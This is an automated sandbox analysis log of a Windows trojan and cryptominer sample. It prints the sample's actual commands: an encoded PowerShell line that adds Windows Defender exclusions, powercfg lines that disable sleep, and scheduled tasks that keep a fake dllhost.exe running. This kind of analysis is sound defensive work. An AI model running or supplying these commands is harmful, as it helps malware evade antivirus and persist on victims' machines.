                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C901A02_2_00C901A0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C989A02_2_00C989A0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C969402_2_00C96940
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C991502_2_00C99150
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C8B9602_2_00C8B960
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CB71702_2_00CB7170
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CED90A2_2_00CED90A
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C9E9002_2_00C9E900
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CB01102_2_00CB0110
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CD41102_2_00CD4110
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CD69202_2_00CD6920
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CB81302_2_00CB8130
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CF22CA2_2_00CF22CA
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CB22F02_2_00CB22F0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA3A902_2_00CA3A90
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA52902_2_00CA5290
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C97AA02_2_00C97AA0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CB8AA02_2_00CB8AA0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C982B02_2_00C982B0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CE12B02_2_00CE12B0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CE7AB02_2_00CE7AB0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C872402_2_00C87240
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CB3A502_2_00CB3A50
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CC8A702_2_00CC8A70
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA32002_2_00CA3200
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CD1A002_2_00CD1A00
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CE22102_2_00CE2210
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CE3A202_2_00CE3A20
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CF82302_2_00CF8230
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CC93D02_2_00CC93D0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CE93E02_2_00CE93E0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CAABF02_2_00CAABF0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C9DB802_2_00C9DB80
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C90B902_2_00C90B90
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C91BA02_2_00C91BA0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C9E3A02_2_00C9E3A0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CB53A02_2_00CB53A0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CD7BB02_2_00CD7BB0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CCEB402_2_00CCEB40
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C97B502_2_00C97B50
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CCA3502_2_00CCA350
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CD03502_2_00CD0350
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA93602_2_00CA9360
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C8A3002_2_00C8A300
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C87B002_2_00C87B00
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C883102_2_00C88310
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C9B3102_2_00C9B310
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA73202_2_00CA7320
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CC13202_2_00CC1320
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CDBCC02_2_00CDBCC0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CD84C02_2_00CD84C0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CEA4C02_2_00CEA4C0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C854D02_2_00C854D0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CC4CB02_2_00CC4CB0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C924502_2_00C92450
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA54502_2_00CA5450
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CC64602_2_00CC6460
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C9EC702_2_00C9EC70
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CB3C702_2_00CB3C70
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA2C002_2_00CA2C00
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CE1C002_2_00CE1C00
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C94C102_2_00C94C10
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C9D4102_2_00C9D410
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CB34102_2_00CB3410
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C944302_2_00C94430
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C904302_2_00C90430
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CD34302_2_00CD3430
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA55C02_2_00CA55C0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C88DD02_2_00C88DD0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CBF5D02_2_00CBF5D0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CB7DD02_2_00CB7DD0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C90DE02_2_00C90DE0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CC7DF02_2_00CC7DF0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00D055922_2_00D05592
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA2D802_2_00CA2D80
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CBC5A02_2_00CBC5A0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C8CD502_2_00C8CD50
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CBB5602_2_00CBB560
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CE3D602_2_00CE3D60
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA9D002_2_00CA9D00
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CDFD002_2_00CDFD00
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CD95002_2_00CD9500
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C935102_2_00C93510
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CBFD202_2_00CBFD20
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C89D302_2_00C89D30
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C965302_2_00C96530
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA35302_2_00CA3530
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C976C02_2_00C976C0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CBAEC02_2_00CBAEC0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CBD6E02_2_00CBD6E0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CB86E02_2_00CB86E0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CCAEE02_2_00CCAEE0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C8B6F02_2_00C8B6F0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA66F02_2_00CA66F0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CC2E802_2_00CC2E80
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C896902_2_00C89690
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C8E6902_2_00C8E690
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CD56902_2_00CD5690
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CC3EA02_2_00CC3EA0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C816B02_2_00C816B0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA5EB02_2_00CA5EB0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CE46402_2_00CE4640
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CC96502_2_00CC9650
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C8DE602_2_00C8DE60
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CE9E602_2_00CE9E60
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C8C6102_2_00C8C610
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA0E102_2_00CA0E10
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CE7E102_2_00CE7E10
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C906202_2_00C90620
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CAFE202_2_00CAFE20
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA6FC02_2_00CA6FC0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CD2FC02_2_00CD2FC0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C827E02_2_00C827E0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CD07F02_2_00CD07F0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CC6F902_2_00CC6F90
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CDFF902_2_00CDFF90
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C997402_2_00C99740
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA1F502_2_00CA1F50
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00D037182_2_00D03718
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C8BF102_2_00C8BF10
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00CA2F102_2_00CA2F10
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00C93F202_2_00C93F20
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeCode function: 10_2_054BF2E410_2_054BF2E4
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04E1B57013_2_04E1B570
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04E1B55013_2_04E1B550
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08AB3F2013_2_08AB3F20
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\Dllhost\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: String function: 0041ACC0 appears 85 times
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: String function: 00CEDE10 appears 97 times
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: String function: 00CF607C appears 44 times
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: String function: 0040B1D0 appears 47 times
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: String function: 00CFAE24 appears 34 times
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 704
                  Source: winlogson.exe.10.drStatic PE information: Number of sections : 11 > 10
                  Source: winlogson.exe.10.drStatic PE information: No import functions for PE file found
                  Source: winlogson.exe.10.drStatic PE information: Data appended to the last section found
                  Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTask32Main.exe@ vs setupx 1.exe1.exe
                  Source: setupx 1.exe1.exe, 00000002.00000003.1308543577.0000000000FEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTask32Main.exe@ vs setupx 1.exe1.exe
                  Source: setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTask32Main.exe@ vs setupx 1.exe1.exe
                  Source: setupx 1.exe1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: setupx 1.exe1.exeStatic PE information: Section: .bss ZLIB complexity 1.0003259892086331
                  Source: setupx 1.exe1.exeStatic PE information: Section: .bss ZLIB complexity 1.0003259892086331
                  Source: WinRing0x64.sys.10.drBinary string: \Device\WinRing0_1_2_0
                  Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@33/17@2/3
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_00442800 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00442800
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeMutant created: \Sessions\1\BaseNamedObjects\ProgramV3
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6676
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_03
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile created: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeJump to behavior
                  Source: setupx 1.exe1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: setupx 1.exe1.exe, 00000002.00000003.1035882521.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1058083015.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1036366767.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1057734750.00000000037C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: setupx 1.exe1.exeVirustotal: Detection: 65%
                  Source: setupx 1.exe1.exeReversingLabs: Detection: 65%
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeFile read: C:\Users\user\Desktop\setupx 1.exe1.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\setupx 1.exe1.exe "C:\Users\user\Desktop\setupx 1.exe1.exe"
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeProcess created: C:\Users\user\Desktop\setupx 1.exe1.exe "C:\Users\user\Desktop\setupx 1.exe1.exe"
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 704
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeProcess created: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe "C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA=="
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeProcess created: C:\Users\user\Desktop\setupx 1.exe1.exe "C:\Users\user\Desktop\setupx 1.exe1.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeProcess created: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe "C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate offJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate offJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeSection loaded: apphelp.dllJump to behavior
